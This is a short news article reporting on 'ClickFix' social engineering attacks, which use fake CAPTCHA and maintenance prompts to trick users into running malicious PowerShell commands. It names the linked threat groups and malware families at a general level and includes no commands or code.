Hackers Lure Victims With Fake Prompts in ClickFix Attacks

Hackers are deploying a new social engineering tactic known as “ClickFix” to exploit human error by mimicking routine computer prompts, cybersecurity researchers warned. First observed in March 2024, the method disguises malicious activity as legitimate system messages—such as CAPTCHA verifications or maintenance alerts—tricking users into executing harmful PowerShell commands.

The technique has been linked to threat actors including APT28 and MuddyWater, with attacks spanning sectors from healthcare to government. Analysts at Darktrace have identified ClickFix campaigns across the U.S., Europe, Middle East and Africa. These attacks often begin with spear phishing emails or compromised websites, redirecting users to fake prompts instructing them to run malicious code.

Once triggered, the malware establishes command-and-control channels, enabling data exfiltration and network traversal. Payloads often include variants of XWorm, Lumma, and AsyncRAT. The attack chain leverages user trust in system functions, highlighting the ongoing vulnerability at the intersection of human behavior and cybersecurity.